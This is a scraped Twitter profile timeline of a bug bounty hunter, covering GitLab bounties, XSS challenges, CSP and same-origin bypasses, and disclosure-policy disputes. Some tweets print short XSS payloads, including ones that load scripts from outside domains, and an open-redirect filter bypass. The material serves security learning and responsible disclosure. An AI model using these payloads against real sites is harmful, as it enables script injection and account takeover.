Johan Carlsson

@joaxcar

5,188
Followers
177
Following
109
Media
1,329
Statuses

Father and full time bug hunter 🐞 Using Twitter for infosec only.

Joined January 2022
Pinned Tweet
@joaxcar
Johan Carlsson
1 year
I joined @gregxsunday on his podcast a while back. Realized I did not have a tweet with it to “pin”. Here is that tweet. Good intro to what I am doing if someone is curious
2
16
136
@joaxcar
Johan Carlsson
2 years
Yesterday I made it into top 5 on @GitLab bug bounty program 🥳, at the same time crossing 100k in bounties from the same. Some people are asking me how to get started or where and what to look for. I thought I could share a practical guide if anyone cares for a thread [1/6]
26
171
936
@joaxcar
Johan Carlsson
1 month
I did not believe I could check off more bucket list items this year. This bug proved me wrong. Found my first ever proper RCE using command injection (through code review), really happy about this one
Tweet media one
24
12
664
@joaxcar
Johan Carlsson
2 years
Looks like this is the time to learn how to hunt for leaked GitLab tokens 👀
Tweet media one
17
56
505
@joaxcar
Johan Carlsson
1 year
I have finally done my first proper bug write-up! This one is about a SOP bypass in Chrome (escalated to ATO) using the Navigation API. Hope someone finds it interesting. Feel free to leave me any comments; I want to improve on this!
9
113
505
@joaxcar
Johan Carlsson
9 months
Did a little writeup of the CSP bypass I reported to PortSwigger. It might be interesting to anyone who saw the disclosed report and wonders if CSP bypasses are the new ripe low-hanging fruit!
4
97
359
@joaxcar
Johan Carlsson
2 months
Finally 🥳
Tweet media one
26
5
343
@joaxcar
Johan Carlsson
2 months
Can someone explain this
Tweet media one
10
25
279
@joaxcar
Johan Carlsson
1 year
Small XSS challenge. Real life situation that I solved today. Should be pretty easy, but good practice if you are just getting into XSS or are trying to get away from copy pasting payloads
23
45
271
@joaxcar
Johan Carlsson
4 months
Everyone is raving about CSPT used as CSRF. Why not celebrate that this was explained already in the Web Application Hacker's Handbook?! See @PortSwigger blog from 2007: Also, let's bring back the name “On-site Request Forgery”
6
41
271
@joaxcar
Johan Carlsson
8 months
Just dropped off my work computer at the office. From tomorrow I will do bug bounties full time for three months. After that, evaluate if my mental health can cope with it. Wish me good luck!
44
2
265
@joaxcar
Johan Carlsson
2 years
My first disclosure to reach 100 up-votes on @Hacker0x01 . Disclosures have been the number one learning resource for me, so to see people finding an interest in my own reports makes me happy! Also thanks @gitlab for allowing full disclosures, contributing to this great resource
Tweet media one
6
21
258
@joaxcar
Johan Carlsson
2 months
Thanks for the great explanations for this. Apparently, URL parsing (at least in browsers) is supposed to strip out "newlines" AND tabs. So all of these will land on /b
Tweet media one
@joaxcar
Johan Carlsson
2 months
Can someone explain this
Tweet media one
10
25
279
4
30
197
@joaxcar
Johan Carlsson
3 months
I just dropped the kids off at school on the first day after summer break. I am officially starting my new career as a full-time bug bounty hunter. Now I just have to find those bugs.
21
1
169
@joaxcar
Johan Carlsson
2 years
Free online hacking course 🥳
@disclosedh1
publiclyDisclosed
2 years
GitLab disclosed a bug submitted by @wcbowling : - Bounty: $33,510 #hackerone #bugbounty
Tweet media one
3
71
344
4
17
165
@joaxcar
Johan Carlsson
7 months
I have now done half of my three-month full-time hunting. Thought I could share some stats
25 submissions:
🟢 1 resolved
🟠 12 triaged
🔵 6 pending
🟤 6 dupes (2 self dupes)
Tools used: 0
Scans run: 0
💰 Economy: I paid my salary with that resolved one
14
3
163
@joaxcar
Johan Carlsson
2 years
Another amazing @fransrosen report to study! Guess the arkoselabs[.]com XSS impacted a lot more sites, but nice usage of it here on GitLab in chain to ATO
1
33
164
@joaxcar
Johan Carlsson
11 months
Try to catch the XSS 🧐 Think this one is a bit harder, but feel free to prove me wrong! No answers in the comments, please
19
22
143
@joaxcar
Johan Carlsson
10 days
This sentiment is so far from my experience hacking. Expecting findings after just 8 hours? You know what I did the last 8 hours? Tried to understand one simple functionality, a few lines of code. Did I find anything? No. Was it worth it? Yes 😀
@NahamSec
Ben Sadeghipour
10 days
I have hacked for almost 8 hours today with 0 findings. Do I recommend it? no. Will I do it all over again tomorrow? Absolutely!
45
83
1K
8
14
153
@joaxcar
Johan Carlsson
1 year
Finally made it past 3000 reputation. The last 1k took a long time as I have had less time to hunt. For information, 3k puts you at top 550 at @Hacker0x01 , and miles from top 100
Tweet media one
11
1
134
@joaxcar
Johan Carlsson
2 months
I might be a bit less active the coming weeks, might miss a DM or two. The reason being the newest family member who decided to join us this weekend. Finally a proud father of four 🥳
27
0
124
@joaxcar
Johan Carlsson
1 year
After two years and more than 100 written reports, ranging from "self closed" to "high", I finally found my first Critical finding on GitLab's bounty program! A lot of luck but also persistence and grind. Checking one item off the bucket list
7
13
115
@joaxcar
Johan Carlsson
2 years
Nice bug! Don't really like this "it's a third party tool" argument to lower the bounty, think the impact should be the measurement. Always good to look for mentions of this in the program scope
@disclosedh1
publiclyDisclosed
2 years
HackerOne disclosed a bug submitted by fransrosen: - Bounty: $500 #hackerone #bugbounty
Tweet media one
0
26
117
7
9
113
@joaxcar
Johan Carlsson
2 years
Found a URI leak bypassing SOP in Firefox
Tweet media one
1
11
111
@joaxcar
Johan Carlsson
11 months
I'm glad to see that quite a few people found this interesting! My solution (and the one that others found) goes like this: \"-alert(1)}})<!--
@joaxcar
Johan Carlsson
1 year
Small XSS challenge. Real life situation that I solved today. Should be pretty easy, but good practice if you are just getting into XSS or are trying to get away from copy pasting payloads
23
45
271
1
12
107
@joaxcar
Johan Carlsson
7 months
Two new DOM sinks to add to any sink list: setHTMLUnsafe and parseHTMLUnsafe. The first one might start to replace some instances of innerHTML. After Chrome 124 it works in all browsers
1
15
105
@joaxcar
Johan Carlsson
8 months
People in the community sending death threats to tool creators when they have issues with their tools!? really? I like this Rs0n guy, he is doing his own thing. Please respect anyone sharing FREE content, or GTFO
7
15
104
@joaxcar
Johan Carlsson
11 months
Finally, I had time to finish the writeup for the hoist challenges. Hope someone finds it valuable. Great job everyone who solved it!
@joaxcar
Johan Carlsson
11 months
Try to catch the XSS 🧐 Think this one is a bit harder, but feel free to prove me wrong! No answers in the comments, please
19
22
143
8
23
103
@joaxcar
Johan Carlsson
11 months
Another XSS challenge. This one is a bit more contrived. Mission:
1. just pop alert
2. run arbitrary JS
Don't write the solution in the thread!
4
15
99
@joaxcar
Johan Carlsson
3 months
Yey I was just awarded 60 internet points and zero dollars for a report to @msftsecresponse rated important. Some user interaction would give full access to victim account (such as reading emails). Reporting to MS has been a terrible experience
11
4
96
@joaxcar
Johan Carlsson
6 months
Finally, I found some time to write a write-up on this! Sorry for the delay. I hope it contains enough context to understand the quirks needed to solve the challenge. Might revisit the post if people have questions, so please DM me if you don't understand
@joaxcar
Johan Carlsson
6 months
⛳️ Challenge time Was a while since I did one of these. Don't post solutions in the thread; send a DM! The flag is in the fragment of the URL. Pop an alert with the flag. Will patch unintended solutions as they drop in 😅
8
9
74
0
13
97
@joaxcar
Johan Carlsson
2 years
Finding a critical bug 5 mins before Friday dinner with my kids, gives mixed feelings. Destroy dinner by reporting asap or get duped, but with a happy family? Hard choice 🤷‍♂️
7
0
93
@joaxcar
Johan Carlsson
6 months
Things are looking good for that last May salary 😀
Tweet media one
8
0
88
@joaxcar
Johan Carlsson
1 year
This one was weird: "we had a regression and many others reported it, so we will lower the bounty to 10%". I mean, either you have a vulnerability or you don't. Blaming regression was a new one.
@disclosedh1
publiclyDisclosed
1 year
Reddit disclosed a bug submitted by mrzheev: - Bounty: $500 #hackerone #bugbounty
Tweet media one
0
12
53
13
7
86
@joaxcar
Johan Carlsson
7 months
Did something fun with this the other week. "Form clobbering"
Tweet media one
4
8
85
@joaxcar
Johan Carlsson
4 months
Great post! Some other related research from 2012 where the escape chars can also act as no-ops to bypass WAF/filters
@Sonar_Research
Sonar Research
4 months
🔥 XSS on any website with missing charset information? 😳 Attackers may leverage the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. Read more in our latest blog post: #appsec #security #vulnerability
Tweet media one
7
210
614
4
12
81
@joaxcar
Johan Carlsson
11 months
What about x.y.z("test-INJECT") should not be too hard
@Rhynorater
Justin Gardner
1 year
Somebody asked me recently if you can exploit an XSS scenario like this: x.y(1,INJECT); where x and y are not defined. You cannot break out of the script tag, but you can break out of the function call. I tried everything I could think of to abuse error handling and hoisting
13
25
145
15
12
79
@joaxcar
Johan Carlsson
1 year
Finally made it to top three at @gitlab 's bounty program! 🥳 It's getting harder and harder to climb this ladder. Just need to double up to get that first place..
Tweet media one
5
1
78
@joaxcar
Johan Carlsson
2 years
Some personal highlights 2022 on @gitlab :
- Most valid reports in 2022 (22)
- Made it to top 4 on leaderboard
- 120k bounties
- At least one valid report per month
Great program, great team!
@gitlab
🦊 GitLab
2 years
🎉 Here's what a record-breaking Bug Bounty year looks like.
🤑 Awarded a total of $1,055,770 USD in bounties in 2022
📈 Received a total of 920 reports from 424 researchers
🔧 Resolved 158 valid reports and made 94 public
3
25
120
5
0
72
@joaxcar
Johan Carlsson
2 years
Another XSS in @GitLab . This one used an unsanitized URL for the payload, and a poorly sanitized HTML element to increase the impact probability. Delivered to the GitLab server by a spoofed ZenTao server.
@disclosedh1
publiclyDisclosed
2 years
GitLab disclosed a bug submitted by @joaxcar : - Bounty: $13,950 #hackerone #bugbounty
Tweet media one
0
10
71
2
7
72
@joaxcar
Johan Carlsson
6 months
⛳️ Challenge time Was a while since I did one of these. Don't post solutions in the thread; send a DM! The flag is in the fragment of the URL. Pop an alert with the flag. Will patch unintended solutions as they drop in 😅
8
9
74
@joaxcar
Johan Carlsson
2 years
This report to GitLab by @ryotkak shows a great way to use the "dirty dance none happy path OAuth feature", discussed in @fransrosen 's blog post, to escalate a chain of open redirects to account takeover
1
19
73
@joaxcar
Johan Carlsson
2 years
Found a small issue in Grafana, the fix is out now in the latest release: CVE-2023-1387. Grafana uses the GitHub vulnerability reporting feature which is really nice to work with, putting some pressure on the big platforms out there 😊
2
10
73
@joaxcar
Johan Carlsson
2 years
Until recently I have taken zero notes and have to re-google everything all the time. The new me is using @GitLab to structure my research 😎 Thanks go out to @realArcherL , @dee__see , and @ajxchapman for amazing tips in
2
22
72
@joaxcar
Johan Carlsson
1 year
Here we go again! Still no sign of the 20% policy in the policy @Hacker0x01 😊. Clear rules are important, the guy here spent a lot of extra time working on this issue without info about the hidden rules..
@disclosedh1
publiclyDisclosed
1 year
HackerOne disclosed a bug submitted by @lotus_619 : - Bounty: $1,576 #hackerone #bugbounty
Tweet media one
5
15
86
2
4
68
@joaxcar
Johan Carlsson
3 months
If you want to get better at client side JS hacking, this is what you have been waiting for!
@Rhynorater
Justin Gardner
3 months
Just recorded a BANGER of a 2hr @ctbbpodcast episode with @MtnBer . He prepped super well for the pod and dropped a shit ton of great tips. My fav was a 🤯 new technique for exploiting selfXSS utilizing cookies' path attribute, cookie jar overflow, and a common redirect gadget.
7
19
170
2
5
68
@joaxcar
Johan Carlsson
1 year
There are some good and common ways to gain redirects, like "@" and "." but I have also had a lot of success with "//". A lot of simple filters check if the URL is "relative" by checking if it starts with a slash, forgetting that //attacker[.]com is not relative.
@ctbbpodcast
Critical Thinking - Bug Bounty Podcast
1 year
Freaking good redirect validation bypass payload: http://attacker[.]com\@test[.]com The backslash will be normalized to a slash by the browser and result in the OR. I see this issue a lot. (Obviously [.] is not a part of the payload, it prevents X from turning it into a link)
3
23
174
1
8
67
@joaxcar
Johan Carlsson
9 months
I spent quite some time on this challenge by @kevin_mizu . Ended up finding a new jQuery CSPP gadget using $().on() event creation. Did a writeup on the process of finding the gadget 👇
@kevin_mizu
Kévin - Mizu
9 months
Challenge time is now over ⏰ TL;DR
- HTML injection
- Axios DOM Based CSPP
- Axios CSPP response overwrite gadget
- jQuery DOM Clobbering + CSPP selector overwrite gadgets
- Setting src attr to "javascript:" for each HTML node ➝ XSS
Detailed writeup 👇
0
13
79
1
12
66
@joaxcar
Johan Carlsson
2 years
1-click XSS to ATO rated as LOW severity... glad I am not doing bug bounties full time 🙃
7
1
65
@joaxcar
Johan Carlsson
19 days
👀 crazy bug. Nice find whoever found it
@BugsAggregator
Security Bug Aggregator
19 days
Sandbox escape from extensions due to insufficient checks in chrome.devtools.inspectedWindow.reload and chrome://policy (reward: $20000)
1
24
137
1
7
63
@joaxcar
Johan Carlsson
1 month
A friend of mine wrote this nice little post about putting a website on the internet. It's basic knowledge for a lot of people, but quite a few developers still lack these fundamentals. I really liked the concept and execution here, thanks @c_r_holm
3
12
59
@joaxcar
Johan Carlsson
2 years
Got the third place in Sweden by one point this year 🥳. Have not focused on quantity, and the point system is a bit weird. Still fun gamification though!
Tweet media one
6
0
58
@joaxcar
Johan Carlsson
2 years
The easiest way to find out what to look for is the latest security release. See what others are finding at the moment, usually there are more bugs of the same type present [2/6]
1
5
56
@joaxcar
Johan Carlsson
2 years
Great talk by @spaceraccoonsec outlining how to approach the changing landscape of bug-bounty/infosec. The point about plateauing in skill level by getting stuck finding and reporting similar bugs really resonated with me.
0
16
57
@joaxcar
Johan Carlsson
5 months
I started doing a short summary post on my first three months of full-time bug bounty hunting. What is more interesting 1. Free-flowing thoughts and feelings? 2. Hard stats? (3. actually posting the post without aiming for "perfection")
12
0
57
@joaxcar
Johan Carlsson
1 year
This is sad as I did not get to use my fun "hidden payload" in userinfo. The second one is still working though! Also, note that userinfo stays in the URL on relative links!
Tweet media one
@garethheyes
Gareth Heyes
1 year
My current fav XSS has gone 😢 <script>location.protocol='javascript'</script> No longer works 👎
6
8
70
2
2
56
@joaxcar
Johan Carlsson
2 years
A program on HackerOne has asked me for about 10 retests, without using the paid retest feature. After some days I have now gotten "any update sir" requests on them, the tables have turned! 😊
3
0
55
@joaxcar
Johan Carlsson
8 months
Great post by @garethheyes . I have used the form trick multiple times. I also find it strange that does not include it in their "safe example" (or as a warning). This could be one of the reasons why it's so often overlooked
Tweet media one
@PortSwigger
PortSwigger
8 months
Are CSP's getting in the way of scoring that Bug Bounty you have been working on? 😫 Lucky for you, our research team ( @PortSwiggerRes ) has released some new techniques using Form Hijacking to bypass that protection and get you hacking again; enjoy!
2
61
234
1
6
56
@joaxcar
Johan Carlsson
1 year
Tweet explained
1. reportError is "new" as of Chrome 95
2. It only takes 1 argument. The second arg here is just an inline assignment
3. You need the = before alert as the string produced by the error is "Uncaught <payload>" and eval needs valid syntax
Nice one! Fun to dig into
@PortSwiggerRes
PortSwigger Research
1 year
The new reportError() function enables a quite amusing XSS vector:
Tweet media one
3
48
322
5
4
55
@joaxcar
Johan Carlsson
2 years
Found a duplicate high severity bug on @GoogleVRP . Will nevertheless count it as my first valid bug on their program 🥳 Getting that duplicate email is not a great feeling, but it at least shows that finding Google bugs is not out of reach
2
1
52
@joaxcar
Johan Carlsson
2 years
Interesting write-up about a blockchain bug. Scoring 1M$ in bounty. Key takeaway after reading: It's all about domain knowledge! The same goes for all programs, there are tons of "simple" bugs that you can only find if you know the domain.
2
6
53
@joaxcar
Johan Carlsson
2 years
Must admit, I did not know what this Hackvertor thing by @garethheyes was all about. After watching this video, I will not be able to live without it! 🙇‍♂️
1
6
52
@joaxcar
Johan Carlsson
2 years
Another HTML injection, resulting in arbitrary POST requests as victim user. In worst case getting admin access to the GitLab instance. Payload delivered through Jira integration
@disclosedh1
publiclyDisclosed
2 years
GitLab disclosed a bug submitted by @joaxcar : - Bounty: $8,690 #hackerone #bugbounty
Tweet media one
0
6
45
2
7
52
@joaxcar
Johan Carlsson
7 months
So what's up with this JSONP throwing the "bad callback error" to get executed by the bad callback 🙃
7
6
52
@joaxcar
Johan Carlsson
6 months
Finally got another payout! I can now pay my salary for April as well 😅
@joaxcar
Johan Carlsson
7 months
@joernchen no, I have only had to pay myself for one month so far. The next one is due in a week. Let's pray for some more payouts! (on a serious note, I had the economy for all months from the get-go and would not have done this otherwise). But it did pay more than my day job
1
0
4
4
2
51
@joaxcar
Johan Carlsson
11 months
Time for a solution here. ");import"//nj.rs"//
@joaxcar
Johan Carlsson
11 months
What about x.y.z("test-INJECT") should not be too hard
15
12
79
3
6
49
@joaxcar
Johan Carlsson
8 months
From what I can see this is just a UI bug. I would recommend @Hacker0x01 to fix this promptly as a lot of people are getting confused and making allegations against triagers (tip: don't!). The dupe is same program (all the time) @jobertabma #bugbountytip
Tweet media one
1
1
49
@joaxcar
Johan Carlsson
2 years
Nice and clean XSS in GitLab. Worth noting here that the CSP bypass works for all scripts generated by other scripts decorated with a valid nonce. The trust is inherited. In this case jQuery is loaded with a nonce. Included scripts are a great place to look for CSP bypasses
@yvvdwf
yvvdwf
2 years
CSP-bypass using jQuery: if you see $(a).append(html), then try html="<script>alert(1)</script>" Example:
2
35
124
0
5
47
@joaxcar
Johan Carlsson
21 days
So Zendesk answer with a post blaming 1. The state of modern systems being interconnected 2. Customers not following “best practices” 3. The researcher “breaching trust” Good to know that Zendesk did NOTHING wrong here!
@hackermondev
daniel
21 days
Zendesk finally responded. Well, if you count a shady-looking GitHub account dropping a blog link as a response: They've doubled down, reaffirming their decision not to award a bounty, claiming I broke ethical guidelines by sharing the bug.
Tweet media one
25
26
235
1
0
49
@joaxcar
Johan Carlsson
1 year
Let's keep the inspiration flowing. The last three could probably be done better, but I am quite happy with the pathname one.
Tweet media one
@garethheyes
Gareth Heyes
1 year
Wait. What. Hehe. https://alert(1)@ example. com <a href=/ id=x>test</a> <script> eval(x.username) </script> Inspired by:
4
22
170
2
7
47
@joaxcar
Johan Carlsson
1 year
@garethheyes @Rhynorater @avlidienbrunn @jub0bs @LiveOverflow Hey thanks for inspiration! x.y(alert(1));function x(){}
4
5
46
@joaxcar
Johan Carlsson
2 years
This is what deep knowledge of your target can do for you while hunting for bugs! Another amazing escalation of a "trivial issue" by  @wcbowling Getting at the @gitlab CTF flag
0
6
47
@joaxcar
Johan Carlsson
6 months
Guess this is me trying to adhere to the old saying "If you're the smartest person in the room, you are in the wrong room" This time I was certainly in the right room 😅. An honor watching masters at work
@kevin_mizu
Kévin - Mizu
6 months
It was fun looking for bugs with @ryotkak , @hash_kitten , @joaxcar , @TheGrandPew and @IcesFont 😁 As always, thanks to @cure53berlin for the reactivity 🙏 2/2
4
0
25
0
1
46
@joaxcar
Johan Carlsson
11 months
I spend a lot of time playing with quirks in JavaScript. They are often great for hacking. But there is also a case to be made for learning how things are meant to be used. I found this course by Dan Abramov very insightful and highly recommend it:
2
7
46
@joaxcar
Johan Carlsson
6 months
Turning 37 today. My mother sent me this. Child 1337 😎 (and no, that's not my social security number at the bottom)
Tweet media one
7
0
46
@joaxcar
Johan Carlsson
3 months
🤯
Tweet media one
@MtnBer
Matan Berson
3 months
@joaxcar I’m pretty sure it does, you should probably still check that though just to make sure
0
0
2
3
5
45
@joaxcar
Johan Carlsson
4 months
Just to make clear, this is some great research! Two important meta-takeaways:
1. The usefulness of a vuln type might change over time. CSRF protections have made this one more important
2. Understand that CSPT is a means to an end. OSRF is one such end, but not the only one
@Doyensec
Doyensec
4 months
CSRF in modern web apps? It's still possible! Our latest research by @maxenceschmitt dives into using Client-Side Path Traversal to perform CSRF. Check out our latest blogpost and brand new #Burp extension for finding bugs. #doyensec #appsec #CSPT2CSRF
Tweet media one
1
50
123
2
3
45
@joaxcar
Johan Carlsson
2 years
If I can control response headers on a service, which ones can be abused? Like "Set-Cookie" to set cookies on the domain, "Location" for redirects, and CORS headers to loosen restrictions. What more? The victim is the visitor, I control the response on the target domain. (no XSS)
13
2
43
@joaxcar
Johan Carlsson
2 years
Some follow up here [7/6]
1. ⚠️ Do not ever test DOS on gitlab[.]com or other production instances! Only self-hosted
2. Why DOS? It's arbitrary, the point is to find an area to focus on to not get analysis paralysis
3. This is how I started, but with a focus on GraphQL AC
3
3
43
@joaxcar
Johan Carlsson
2 years
If you follow these steps you will have learned a LOT about security, DOS issues, GitLab, setting up environments and replicating vulnerabilities. You will also most certainly be in a great position to find your first bug on the GitLab @Hacker0x01 program. [6/6]
2
3
44
@joaxcar
Johan Carlsson
10 months
Managed to find my way into the 2023 @gitlab bounty highlights. Such a great program! Congrats to @yvvdwf for a well deserved “best report” again, and pwnie for a hard to contest “highest impact”
7
0
44
@joaxcar
Johan Carlsson
2 years
My twitter feed
Musk: Trump!
Andrew Tate: Maaaaan!
Bots: Crypto!
My mastodon feed
Security researchers: long detailed informative posts
Sorry but I only signed up here for infosec, will still check in here but will focus on @joaxcar @infosec .exchange
1
0
42
@joaxcar
Johan Carlsson
2 years
This report is a great example of the goldmine that @Hacker0x01 Hacktivity is. The report is a bit confusing, and it took a couple of tries to recreate based on the description. But I had never heard of the Service Worker API before, learning so much from this one!
@disclosedh1
publiclyDisclosed
2 years
GitLab disclosed a bug submitted by ehhthing: - Bounty: $1,680 #hackerone #bugbounty
Tweet media one
0
9
18
0
4
43
@joaxcar
Johan Carlsson
6 months
I managed to take a proper vacation last week. Spending every waking hour in pool/sea with my kids. Did no hacking, and no writeup. Sorry about that to those who waited. I can promise a solution post tomorrow when I am back to work 🏖️
@joaxcar
Johan Carlsson
6 months
Great job everyone who solved this so far! Only intended solutions this time 😄 I will release the solution on Sunday
2
0
14
1
0
42
@joaxcar
Johan Carlsson
11 months
Another great post on hoisting by @brutelogic ! Missed this one when doing my own research. Interestingly, the payload from my post works on the second example (undefined2.php) without hijacking atob: %27-alert(1));function%20myObj(){}//
@BRuteLogic
Brute Logic
11 months
A good technique to deal with JSi based undefined scenarios. #XSS
1
19
71
2
5
39
@joaxcar
Johan Carlsson
1 year
@renniepak @0xH4rmony <script/src="//0-a%2enl"></script> 34 chars, browsers are nice enough to correct the missing space
3
6
41
@joaxcar
Johan Carlsson
2 years
Not the most advanced bug, but a good one to look for. I have found multiple instances of this in multiple programs. The bug type is also covered in
@gregxsunday
Bug Bounty Reports Explained
2 years
We all know path traversals. But did you hear about a client-side path traversal? There are few resources about this bug class so many hackers don't check for it. Don't be one of them! Start by watching my explanation of @joaxcar 's $6,580 bug in GitLab!
Tweet media one
3
28
134
0
9
40
@joaxcar
Johan Carlsson
8 months
This was fun. I disagree with most of it, but still some valid points. They are correct in what they point out is a bad approach to BB, but the idea that they would know everything about an application after one engagement?! Well, I respectfully disagree
1
3
41
@joaxcar
Johan Carlsson
22 days
Great finding, highlighting some of the big issues in BB regarding disclosure policies. I think H1 needs to sharpen the rules around OOS and Informational reports. The reporter here helped secure a lot of companies and that should be the end goal
@hackermondev
daniel
22 days
1 Bug, $50K+ in bounties: how Zendesk left a backdoor in hundreds of companies #bugbountytips
79
315
1K
0
2
39
@joaxcar
Johan Carlsson
2 years
For us living in the DevTools console my life is going to become so much smoother! Going to use on Monday:
$_
monitor(foo)
getEventListeners($0)
queryObjects(Promise)
1
5
40
@joaxcar
Johan Carlsson
2 years
Now go to the GitLab issue tracker and search for old DOS security issues. Read them all. Then install any vulnerable version in a docker container and replicate some of the issues. Try to recreate the ones from 15.3.2 [4/6]
1
4
40
@joaxcar
Johan Carlsson
2 years
In 15.3.2 there were five DOS bugs, all given a medium severity. DOS bugs like these are present in almost every GitLab security release lately. They are easy enough to replicate, and one can hunt for them both statically and dynamically. [3/6]
Tweet media one
1
3
38
@joaxcar
Johan Carlsson
11 months
It may be too soon for another challenge, but I needed to get this out before posting a write-up about a WebKit mime sniffing bug. Let's see if you can find some unintended solutions here. I guess there could exist a few. Mission: XSS 🤷‍♂️
1
10
39